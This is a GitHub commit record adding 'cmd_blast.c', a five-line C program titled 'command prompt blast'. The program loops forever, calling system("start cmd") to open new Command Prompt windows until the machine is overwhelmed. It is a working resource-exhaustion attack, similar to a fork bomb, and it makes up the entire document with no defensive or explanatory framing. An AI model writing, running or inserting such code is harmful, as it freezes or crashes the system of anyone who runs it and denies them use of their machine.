command prompt blast

This commit is contained in:
Minhas Kamal
2016-11-16 12:03:58 +06:00
committed by GitHub
parent a56285e4a6
commit 719c87148a

5
cmd_blast.c Normal file
View File

@@ -0,0 +1,5 @@
main(){
while(1){
system("start cmd");
}
}